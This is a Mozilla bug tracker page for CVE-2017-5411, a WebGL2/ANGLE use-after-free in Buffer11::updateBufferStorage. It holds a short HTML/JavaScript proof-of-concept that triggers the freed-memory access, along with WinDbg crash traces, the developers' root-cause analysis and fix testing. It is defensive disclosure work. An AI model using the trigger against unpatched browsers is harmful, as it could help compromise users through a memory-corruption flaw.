Closed
Bug 1325511
(CVE-2017-5411)
Opened 8 years ago
Closed 8 years ago
libGLES - Use After Free in Buffer11::updateBufferStorage()
Categories
(Core :: Graphics: CanvasWebGL, defect)
Tracking
()
RESOLVED
FIXED
mozilla54
People
(Reporter: loobenyang, Assigned: milan)
References
Details
(5 keywords, Whiteboard: [post-critsmash-triage][adv-main52+])
Attachments
(5 files)
|
966 bytes,
text/html
|
Details | |
|
142.09 KB,
image/jpeg
|
Details | |
|
109.04 KB,
image/jpeg
|
Details | |
|
831 bytes,
patch
|
mtseng
:
review+
jcristau
:
approval-mozilla-aurora+
jcristau
:
approval-mozilla-beta+
gchang
:
approval-mozilla-esr45+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
|
1.06 KB,
text/html
|
Details |
Graphics_aboutsupport.JPG
Reproduction test case:
<html><body ><canvas id="test"></canvas></body><script>
var canvas0=document.getElementById("test");
var gl = canvas0.getContext("webgl2");
var buffer0= gl.createBuffer();
gl.bindBuffer(gl.UNIFORM_BUFFER, buffer0);
gl.bindBuffer(gl.ARRAY_BUFFER, buffer0);
var myImage = new Image();myImage.src = "non.jpg";myImage.onerror = function(){ canvas0.width = "418";}
var observer0 =new MutationObserver(function listener1(event) {
if( typeof listener1.counter == "undefined"){listener1.counter = 0;}
if(listener1.counter > 3) return;
listener1.counter++;
var vertices = [ 1.0, 1.0, 0.0, -1.0, 1.0, 0.0, 1.0, -1.0, 0.0, -1.0, -1.0, 0.0];
gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(vertices), gl.STATIC_DRAW);;
canvas0.width = "418";
gl.bufferData(gl.UNIFORM_BUFFER, 2626,gl.STATIC_COPY);
}); observer0.observe(canvas0, {attributes: true});
var timeout0 = setTimeout(function(){ gl.bufferData(gl.ARRAY_BUFFER, 2167,gl.STREAM_DRAW); }, 74);
</script></html>
Steps to reproduce:
1. Open the test case UAF_updateBufferStorage_Repro.html in Firefox browser.
Firefox version: 53.0a1 (2016-12-22) (32-bit)
OS: Windows 10
Stack trace:
(615c.6088): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=11ab9280 ecx=11ab9280 edx=0dc8ba00 esi=11afc280 edi=11afc280
eip=65181b4d esp=010fdea4 ebp=010fded8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
65181b4d ff5008 call dword ptr [eax+8] ds:002b:e5e5e5ed=????????
2:059> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
65181b4d ff5008 call dword ptr [eax+8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 65181b4d (libGLESv2!rx::Buffer11::updateBufferStorage+0x000000db)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: e5e5e5ed
Attempt to read from address e5e5e5ed
FAULTING_THREAD: 00006088
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: e5e5e5ed
READ_ADDRESS: e5e5e5ed
FOLLOWUP_IP:
libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
65181b4d ff5008 call dword ptr [eax+8]
NTGLOBALFLAG: 400
APPLICATION_VERIFIER_FLAGS: 0
APP: firefox.exe
ANALYSIS_VERSION: 10.0.10240.9 x86fre
BUGCHECK_STR: INVALID_POINTER_READ_IN_CALL
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_IN_CALL
LAST_CONTROL_TRANSFER: from 6518175f to 65181b4d
STACK_TEXT:
010fded8 6518175f 010fdefc 11ab9280 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xdb
010fdf08 65180d5c 010fdf20 00000000 1189ac40 libGLESv2!rx::Buffer11::getBufferStorage+0x85
010fdf34 65180e2e 010fdf50 00000000 1189ac40 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
010fdf64 65180cad 010fdf88 00008892 1159b000 libGLESv2!rx::Buffer11::setSubData+0x94
010fdf94 65213ca0 010fdfbc 00008892 1159b000 libGLESv2!rx::Buffer11::setData+0x29
010fdfd4 6514a85d 00008892 00000877 1159b000 libGLESv2!gl::Context::bufferData+0x34
010fdff0 67e716e5 00008892 00000877 1159b000 libGLESv2!gl::BufferData+0x40
010fe010 682c7787 00008892 00000877 1159b000 xul!mozilla::gl::GLContext::fBufferData+0x1a
010fe070 682ce0fd 00008892 00000877 1159b000 xul!mozilla::WebGLBuffer::BufferData+0xc3
010fe0a8 682ce03e 00008892 00000877 1159b000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
010fe0e0 6817cb2e 00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
010fe160 672dee29 075a2000 010fe1b8 118db800 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x2d8
010fe204 672de265 00000000 075a2000 00000000 xul!js::InternalCallOrConstruct+0x5b9
010fe228 672eb010 075a2000 00000001 11b3d200 xul!InternalCall+0xb5
010feb68 67864471 010fec80 010fec80 010fec80 xul!Interpret+0x5990
010febf8 672deb00 075a2000 010fec70 010fed30 xul!js::RunScript+0x231
010fec94 672cbfb8 00000000 010fedec 075a2000 xul!js::InternalCallOrConstruct+0x290
010fecbc 672cb707 010fee38 010feed8 010fee08 xul!js::Call+0x81
010fedb4 671916d5 010feed8 010fee38 010fee08 xul!JS::Call+0x107
010feeac 67191550 075a2000 010feed8 11ad2adc xul!mozilla::dom::Function::Call+0x14f
010ff004 6719133d 010ff038 11ad2adc 010ff080 xul!mozilla::dom::Function::Call<nsCOMPtr<nsISupports> >+0xc1
010ff160 67192647 11ac8520 10f3dce0 11a82010 xul!nsGlobalWindow::RunTimeoutHandler+0x148
010ff204 67190e54 11ac8520 0000000d 11ac8520 xul!mozilla::dom::TimeoutManager::RunTimeout+0x2b8
010ff218 672b6373 11a6d910 11ac8520 11a82010 xul!mozilla::dom::`anonymous namespace'::TimerCallback+0x1f
010ff290 672b62c4 115285c0 115285f4 00000000 xul!nsTimerImpl::Fire+0x9b
010ff2cc 67193ae0 11a82010 0170e160 090d7a04 xul!nsTimerEvent::Run+0x45
010ff2f0 67193a63 68f96ac4 010ff36c 67269171 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
010ff2fc 67269171 11ab9240 01704980 6974b601 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
010ff36c 67194b98 0170e160 6974b601 010ff387 xul!nsThread::ProcessNextEvent+0x14d
010ff388 672678a7 010ff560 01704970 010ff560 xul!NS_ProcessNextEvent+0x16
010ff3b0 67c133d1 010ff560 010ff560 00000000 xul!mozilla::ipc::MessagePump::Run+0xcc
010ff3cc 673454f9 010ff560 c0f8122d 090d7a00 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x58
010ff404 673454c8 0170e160 00000002 090d7a00 xul!MessageLoop::RunHandler+0x20
010ff424 67535f2e 01704970 010ff560 010ff444 xul!MessageLoop::Run+0x19
010ff434 67535cbd 090d7a00 01704970 010ff458 xul!nsBaseAppShell::Run+0x34
010ff444 68a23084 090d7a00 01704970 090d7a00 xul!nsAppShell::Run+0x26
010ff458 67c1338f 010ff560 01704970 010ff4a0 xul!XRE_RunAppShell+0x26
010ff468 673454f9 010ff560 c0f81289 00000003 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x16
010ff4a0 673454c8 0172a000 00000001 69019200 xul!MessageLoop::RunHandler+0x20
010ff4c0 68a22d9b 01701040 0000000b 00000000 xul!MessageLoop::Run+0x19
010ff62c 002b9ce9 0000000b 01701040 010ff64c xul!XRE_InitChildProcess+0x55f
010ff658 002b7e22 6f1672e4 6f1672ec 013c7298 firefox!content_process_main+0x70
010ff9e4 002b5e37 0000000c ffcd16c0 013cbd50 firefox!wmain+0x4e92
010ffa2c 772b38f4 00e4f000 772b38d0 d8aedd39 firefox!__scrt_common_main_seh+0xf9
010ffa40 77d65de3 00e4f000 d87b03d4 00000000 KERNEL32!BaseThreadInitThunk+0x24
010ffa88 77d65dae ffffffff 77d8b7e7 00000000 ntdll!__RtlUserThreadStart+0x2f
010ffa98 00000000 002b5ead 00e4f000 00000000 ntdll!_RtlUserThreadStart+0x1b
FAULTING_SOURCE_LINE: c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp
FAULTING_SOURCE_FILE: c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp
FAULTING_SOURCE_LINE_NUMBER: 807
FAULTING_SOURCE_CODE:
803: latestBuffer = stagingBuffer;
804: }
805:
806: CopyResult copyResult = CopyResult::NOT_RECREATED;
> 807: ANGLE_TRY_RESULT(storage->copyFromStorage(latestBuffer, sourceOffset, storageSize, 0),
808: copyResult);
809: // If the D3D buffer has been recreated, we should update our serial.
810: if (copyResult == CopyResult::RECREATED)
811: {
812: updateSerial();
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: libglesv2!rx::Buffer11::updateBufferStorage+db
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: libGLESv2
IMAGE_NAME: libGLESv2.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 585bd734
STACK_COMMAND: ~59s ; kb
BUCKET_ID: INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db
FAILURE_PROBLEM_CLASS: INVALID_POINTER_READ_IN_CALL
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: libGLESv2.dll
FAILURE_FUNCTION_NAME: rx::Buffer11::updateBufferStorage
FAILURE_SYMBOL_NAME: libGLESv2.dll!rx::Buffer11::updateBufferStorage
FAILURE_BUCKET_ID: INVALID_POINTER_READ_IN_CALL_c0000005_libGLESv2.dll!rx::Buffer11::updateBufferStorage
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_in_call_c0000005_libglesv2.dll!rx::buffer11::updatebufferstorage
FAILURE_ID_HASH: {7530445f-e192-bd84-04e5-903b912a400c}
Followup: MachineOwner
---------
Variables shows that the storage object had been freed:
storage 0x11ab9280 class rx::Buffer11::BufferStorage *
angle::NonCopyable class angle::NonCopyable
__vfptr 0xe5e5e5e5
mRenderer 0xe5e5e5e5 class rx::Renderer11 *
mRevision 0xe5e5e5e5
mUsage 0n-437918235 (No matching enumerant)
mBufferSize 0xe5e5e5e5
sourceOffset 0
storageSize 0xa42
ANGLE_LOCAL_VAR class gl::ErrorOrResult<rx::Buffer11::BufferStorage *>
ANGLE_LOCAL_VAR class gl::ErrorOrResult<enum rx::`anonymous namespace'::CopyResult>
ANGLE_LOCAL_VAR class gl::ErrorOrResult<rx::Buffer11::NativeStorage *>
copyResult <Value unavailable>
latestBuffer 0x11afc280 class rx::Buffer11::BufferStorage *
rx::BufferD3D::mNextSerial <Value unavailable>
this 0x11afc280 class rx::Buffer11 *
__vtcast_rx::Buffer11::NativeStorage class rx::Buffer11::NativeStorage
rx::BufferD3D class rx::BufferD3D
mRenderer 0x68f8ec90 class rx::Renderer11 *
mSize 0x68f8bc90
mMappedStorage 0x00000000 class rx::Buffer11::BufferStorage *
mBufferStorages class std::array<rx::Buffer11::BufferStorage *,8>
mDeallocThresholds class std::array<unsigned int,8>
mIdleness class std::array<unsigned int,8>
mConstantBufferRangeStoragesCache class std::map<long,rx::Buffer11::ConstantBufferCacheEntry,std::less<long>,std::allocator<std::pair<long const ,rx::Buffer11::ConstantBufferCacheEntry> > >
mConstantBufferStorageAdditionalSize 0
mMaxConstantBufferLruCount 0
mStaticBroadcastChannel class angle::BroadcastChannel
mDirectBroadcastChannel class angle::BroadcastChannel
|
||
Comment 1•8 years ago
|
||
Can't reproduce on a 32-bit 2016-12-22 nightly build on Windows 7. Will try on Win10 tomorrow if someone doesn't beat me to it.
Group: core-security → gfx-core-security
Flags: sec-bounty?
Summary: WebGL - Use After Free in Buffer11::updateBufferStorage() → libGLES - Use After Free in Buffer11::updateBufferStorage()
|
Reporter | |
Comment 2•8 years ago
|
||
Is there anyone working on it? It can still be triggered instantly in today's nightly build.
53.0a1 (2017-01-12) (32-bit)
(62e8.44b0): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=117f0800 ecx=117f0800 edx=0d991300 esi=11145b20 edi=11145b20
eip=68f11d48 esp=00d3dc4c ebp=00d3dc80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
68f11d48 ff5008 call dword ptr [eax+8] ds:002b:e5e5e5ed=????????
|
Assignee | |
Comment 3•8 years ago
|
||
I can't reproduce on Windows 10. What's your graphics section of about:support?
|
|
Reporter | |
Comment 4•8 years ago
|
||
|
|
Reporter | |
Comment 5•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #3)
> I can't reproduce on Windows 10. What's your graphics section of
> about:support?
Screenshot for my about:support has been attached in Graphics_aboutsupport.JPG.
Did you run Windows 10 from a real PC or a virtual machine?
virtual machine does not have graphic card, might not be able to excerse the WebGL code.
|
|
Assignee | |
Comment 6•8 years ago
|
||
Right - I'm on Windows 10, Intel+Nvidia.
It'd be interesting to see if this is hardware specific, or just intermittent, but given that it happens for you all the time and not for others that started, it could be hardware specific (or at least timing dependent.)
|
|
Reporter | |
Comment 7•8 years ago
|
||
|
|
Assignee | |
Comment 8•8 years ago
|
||
Looking at the stack (recall that "storage" is what shows up freed):
[1] Buffer11::getSystemMemoryStorage calls getBufferStorage with BUFFER_USAGE_SYSTEM_MEMORY
[2] This allocates or sets "storage" from mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
[3] We call Buffer11::updateBufferStorage with storage
[4] Assuming we get into the nested if condition, where we call Buffer11::getStagingStorage()
[5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
[6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
[7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY
Note that we haven't called markBufferUsage with BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after [3] completes), which means that we haven't called mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide to deallocate that storage.
And we end up with UAF.
I have no proof of this, I can't reproduce the problem :)
Looben, can you do local builds, or would you mind running a treeherder build I put together for you?
|
|
Assignee | |
Comment 9•8 years ago
|
||
|
|
Reporter | |
Comment 10•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #8)
> Looking at the stack (recall that "storage" is what shows up freed):
>
> [1] Buffer11::getSystemMemoryStorage calls getBufferStorage with
> BUFFER_USAGE_SYSTEM_MEMORY
> [2] This allocates or sets "storage" from
> mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
> [3] We call Buffer11::updateBufferStorage with storage
> [4] Assuming we get into the nested if condition, where we call
> Buffer11::getStagingStorage()
> [5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
> [6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
> [7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY
>
> Note that we haven't called markBufferUsage with
> BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after
> [3] completes), which means that we haven't called
> mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide
> to deallocate that storage.
>
> And we end up with UAF.
>
> I have no proof of this, I can't reproduce the problem :)
>
> Looben, can you do local builds, or would you mind running a treeherder
> build I put together for you?
Sure, please let me know once you done generating a treeherder build.
|
|
Assignee | |
Comment 11•8 years ago
|
||
This will have the build with the possible fix: https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
If that doesn't fix it (or even if it does, to confirm what I think could be happening), this is a debug build that should hopefully assert instead of crashing: https://treeherder.mozilla.org/#/jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
Give them until tomorrow to be ready :)
|
|
Reporter | |
Comment 12•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
>
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
>
> Give them until tomorrow to be ready :)
Just tried with the win8 64bit op build from https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1 with the exact same test case, could not reproduce it.
To make sure, I downloaded a normal 64 bit nightly and can reproduce it:
53.0a1 (2017-01-16) (64-bit)
(4624.405c): Access violation - code c0000005 (!!! second chance !!!)
libGLESv2!rx::Buffer11::updateBufferStorage+0x330:
00007ffe`37fa71e4 41ff5210 call qword ptr [r10+10h] ds:e5e5e5e5`e5e5e5f5=????????????????
|
|
Reporter | |
Comment 13•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
>
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
>
> Give them until tomorrow to be ready :)
In the given debug build, it did hit an assert:
err: rx::Buffer11::updateBufferStorage(803): ! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer
|
|
Assignee | |
Comment 14•8 years ago
|
||
Great help, thanks Looben!
|
|
Assignee | |
Comment 15•8 years ago
|
||
Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well. Either way, can you help opening a Chrome security bug and maybe CC one of their security people on this bug, or we can copy the details?
Flags: needinfo?(dveditz)
|
|
Assignee | |
Comment 16•8 years ago
|
||
Looben - when you get the assertion you mention in comment 13, can you post here the full stack it gives you?
Flags: needinfo?(loobenyang)
|
|
Reporter | |
Comment 17•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #16)
> Looben - when you get the assertion you mention in comment 13, can you post
> here the full stack it gives you?
Sure. But windbg would not resolve symbols of this build, not sure if it's any good for you.
err: rx::Buffer11::updateBufferStorage(803): ! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer
(2128.5814): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
ucrtbase!abort+0x4e:
00007ffe`837398fe cd29 int 29h
2:061> !analyze -v
FAULTING_IP:
ucrtbase!abort+4e
00007ffe`837398fe cd29 int 29h
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffe837398fe (ucrtbase!abort+0x000000000000004e)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000007
Subcode: 0x7 FAST_FAIL_FATAL_APP_EXIT
FAULTING_THREAD: 00005814
BUGCHECK_STR: FATAL_APP_EXIT
DEFAULT_BUCKET_ID: FATAL_APP_EXIT
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 0000000000000007
APP: firefox.exe
ANALYSIS_VERSION: 10.0.10240.9 amd64fre
LAST_CONTROL_TRANSFER: from 00007ffe8373b5c1 to 00007ffe837398fe
STACK_TEXT:
00000082`717fca60 00007ffe`8373b5c1 : 00007ffe`00000003 00000000`00000003 00007ffe`356faa88 00007ffe`356fa240 : ucrtbase!abort+0x4e
00000082`717fca90 00007ffe`8373b8eb : 00000000`00000323 00007ffe`356faa88 00000082`717fcb18 0000020c`0000000f : ucrtbase!`anonymous namespace'::argument_list<char>::expand_if_necessary+0x11e9
00000082`717fcad0 00007ffe`354eb5e8 : 00000082`717fcc00 00000082`717fcb80 0000020c`4d707000 00007ffe`356faa60 : ucrtbase!wassert+0x5b
00000082`717fcb00 00007ffe`354d4943 : 0000020c`3f21de40 00000082`717fcc50 0000020c`3f21de40 00000000`00000000 : libGLESv2!glWaitSync+0x765a0
00000082`717fcbc0 00007ffe`354d9576 : 00000000`00000000 0000020c`3f21de40 00000082`717fcd00 00000000`00000877 : libGLESv2!glWaitSync+0x5f8fb
00000082`717fcc30 00007ffe`354e8612 : 00000000`00000000 00007ffe`2d01f9a5 00000082`717fcd48 00000000`00000000 : libGLESv2!glWaitSync+0x6452e
00000082`717fcc80 00007ffe`354e6047 : 0000020c`4d4f4000 0000020c`3f21de40 00000000`00000001 0000020c`4d4f4000 : libGLESv2!glWaitSync+0x735ca
00000082`717fcd50 00007ffe`35635f1a : 00000000`00008892 0000020c`4d752470 00000082`717fce30 00007ffe`35462321 : libGLESv2!glWaitSync+0x70fff
00000082`717fcda0 00007ffe`3563606e : 00000000`00008892 0000020c`4d4f4000 0000020c`4d752470 0000020c`4d75b000 : libGLESv2!glWaitSync+0x1c0ed2
00000082`717fcdf0 00007ffe`3545af32 : 0000020c`4d75b000 00000000`00000877 0000020c`4d4f4000 00000000`000088e0 : libGLESv2!glWaitSync+0x1c1026
00000082`717fce50 00007ffe`29406851 : 0000020c`4d4f4000 0000020c`4d76e000 00000000`00008892 00000000`00000877 : libGLESv2!gl::BufferData+0x6e
00000082`717fce90 00007ffe`294032ac : 0000020c`4d4f4000 00000000`00008892 00000000`00000877 0000020c`4d3cc858 : xul!PrintJSStack+0x2468b1
00000082`717fcec0 00007ffe`2a3d3246 : 00000082`717fcf30 00000000`000088e0 00000082`717fcf71 0000020c`4d3cc858 : xul!PrintJSStack+0x24330c
00000082`717fcf00 00007ffe`2a3e42bc : 00000000`00008892 0000020c`4d4f4000 ffffffff`fffffffe 0000020c`4d3cc880 : xul!mozilla_dump_image+0xdb6426
00000082`717fcfd0 00007ffe`2a3e412a : 00000000`00000005 00000000`00000000 00000082`717fd110 00007ffe`2c4f0d96 : xul!mozilla_dump_image+0xdc749c
00000082`717fd040 00007ffe`29f3fed8 : 00000000`00000005 00000082`717fd400 ffffffff`fffffffe 00007ffe`00005814 : xul!mozilla_dump_image+0xdc730a
00000082`717fd0c0 00007ffe`2a32d986 : 0000020c`45610088 00000082`717fd440 0000020c`45102000 00007ffe`2d691540 : xul!mozilla_dump_image+0x9230b8
00000082`717fd3e0 00007ffe`2ce7d4a3 : 0000020c`45102000 00007ffe`2a32d7cc 0000020c`4d3cc800 0000020c`45610088 : xul!mozilla_dump_image+0xd10b66
00000082`717fd470 00007ffe`2ce89359 : 0000020c`4d3bf800 00000000`00000000 00000082`717fd528 0000020c`456100a8 : xul!XRE_ParseAppData+0x12e86e3
00000082`717fd4d0 00007ffe`2ce8cdd8 : 0000020c`4d60c240 fffe020c`4ce952e0 0000020c`45102000 0000020c`4cf4712e : xul!XRE_ParseAppData+0x12f4599
00000082`717fd570 00007ffe`2ce96ce2 : 0000020c`45102208 00000000`00000000 0000020c`45102208 0000020c`45102208 : xul!XRE_ParseAppData+0x12f8018
00000082`717fe3e0 00007ffe`2ce89400 : 0000020c`45102000 00000082`717fe558 0000020c`45102000 00000082`717fe618 : xul!XRE_ParseAppData+0x1301f22
00000082`717fe510 00007ffe`2ce7d284 : 00000082`717fe618 fffe020c`4ce8a0c0 00000000`00000000 00000082`717fe550 : xul!XRE_ParseAppData+0x12f4640
00000082`717fe5b0 00007ffe`2c4f1747 : 00000082`717fe728 0000020c`45102000 00000082`717fe8b0 0000020c`45102000 : xul!XRE_ParseAppData+0x12e84c4
00000082`717fe5e0 00007ffe`2a17792e : 0000020c`4d608e40 00000082`717fe8b0 00000082`717fe760 00007ffe`2a330d99 : xul!XRE_ParseAppData+0x95c987
00000082`717fe6e0 00007ffe`29738c88 : 00000082`717feb10 0000020c`4d7a8580 00000082`717fe8b0 00007ffe`2d58b828 : xul!mozilla_dump_image+0xb5ab0e
00000082`717fe860 00007ffe`29769089 : 0000020c`4d3bf108 00000000`00000002 0000020c`4d3bf000 00000082`717feb40 : xul!mozilla_dump_image+0x11be68
00000082`717fea90 00007ffe`2982f394 : 0000020c`4c939b80 0000020c`4d752fb0 00000000`00000000 0000020c`4d753040 : xul!mozilla_dump_image+0x14c269
00000082`717fed10 00007ffe`29831e94 : 0000020c`4d752601 0000020c`4d752620 00004434`00000001 0000020c`4d3bf110 : xul!mozilla_dump_image+0x212574
00000082`717fee60 00007ffe`287a273a : 000001ba`4a76b232 0000020c`4d4f3078 00000000`00000000 0000020c`4d7526b0 : xul!mozilla_dump_image+0x215074
00000082`717fee90 00007ffe`28799066 : 0000020c`4cb63f88 00007ffe`3b273252 00000000`00000001 0000020c`3f214a00 : xul!XRE_AddStaticComponent+0x2674e
00000082`717feff0 00007ffe`2878d701 : 0000020c`4cb63f80 00000082`717ff0b8 00000000`00000001 00000000`00000000 : xul!XRE_AddStaticComponent+0x1d07a
00000082`717ff060 00007ffe`2879776d : 00000082`717ff101 0000020c`4d4f3078 00000082`717ff1a0 0000020c`3f240800 : xul!XRE_AddStaticComponent+0x11715
00000082`717ff0f0 00007ffe`28793dab : 0000020c`3f293040 00000082`717ff1b9 00000000`00000000 00000000`00000000 : xul!XRE_AddStaticComponent+0x1b781
00000082`717ff120 00007ffe`287d25ff : 0000020c`3f293040 00007ffe`28cc095e 0000020c`456e11f0 0000020c`3f214a01 : xul!XRE_AddStaticComponent+0x17dbf
00000082`717ff220 00007ffe`28cfacab : 0000020c`45d64e01 0000020c`3f214a10 00000082`717ff600 00007ffe`3b273252 : xul!NS_StringSetIsVoid+0x5edb
00000082`717ff260 00007ffe`28cfaee4 : 00000082`717ff620 00000082`717ff301 00000082`717ff620 00007ffe`2871bac9 : xul!soundtouch::SoundTouch::operator=+0x28513
00000082`717ff2c0 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff3f0 00000000`00000034 00007ffe`3b283e35 : xul!soundtouch::SoundTouch::operator=+0x2874c
00000082`717ff300 00007ffe`28cc6e02 : 0000020c`45138a58 0000020c`4513ec00 00007ffe`2e72fd90 00007ffe`28ccb9dd : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff330 00007ffe`2af35a0b : 0000020c`4513ec40 00007ffe`2a9c9c16 00000000`00000002 00000082`717ff3f0 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff380 00007ffe`2afa9b8d : 0000020c`4513ec40 0000020c`4513ec40 00000082`717ff620 00000000`00000034 : xul!mozilla_dump_image+0x1918beb
00000082`717ff3c0 00007ffe`2bb856d9 : 00000082`717ff620 00007ffe`2dd553c8 0000020c`4513ebe0 0000020c`3f214a10 : xul!mozilla_dump_image+0x198cd6d
00000082`717ff400 00007ffe`28cfadb7 : 0000020c`457fced0 00007ffe`2d1c99b0 0000020c`3f289000 00000000`00010011 : xul!XRE_RunAppShell+0x59
00000082`717ff440 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff600 00000000`00000034 00000082`717ff4a0 : xul!soundtouch::SoundTouch::operator=+0x2861f
00000082`717ff480 00007ffe`28cc6e02 : 00007ffe`2d3c1ab8 00007ffe`287d9684 00007ff7`22dd4974 00007ffe`2bb7a4aa : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff4b0 00007ffe`2bb8503c : 0000020c`3f289000 00000082`717ff600 00000000`00000034 0000020c`3f207580 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff500 00007ff7`22dd1d45 : 00000000`0000000b 00000000`0000000c 0000020c`3f202080 00000000`0000000b : xul!XRE_InitChildProcess+0x888
00000082`717ff7c0 00007ff7`22dd18f9 : 0000020c`3f202080 0000020c`3f202080 00000000`0000000c 0000020c`3f202080 : firefox+0x1d45
00000082`717ff820 00007ff7`22dd266f : 00000000`0000000c 0000020c`3f2020f0 00000000`00000000 00007ffe`87fa2540 : firefox+0x18f9
00000082`717ff8a0 00007ff7`22e112e9 : 00007ffe`837b59f4 00000000`00000000 00000000`0000000d 00000082`7159c000 : firefox+0x266f
00000082`717ff900 00007ffe`86dc8102 : 00007ff7`22e113a0 00000082`7159c000 00000000`00000000 00000000`00000000 : firefox!TargetNtUnmapViewOfSection+0x6a9d
00000082`717ff940 00007ffe`87f8c5b4 : 00007ffe`86dc80e0 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x22
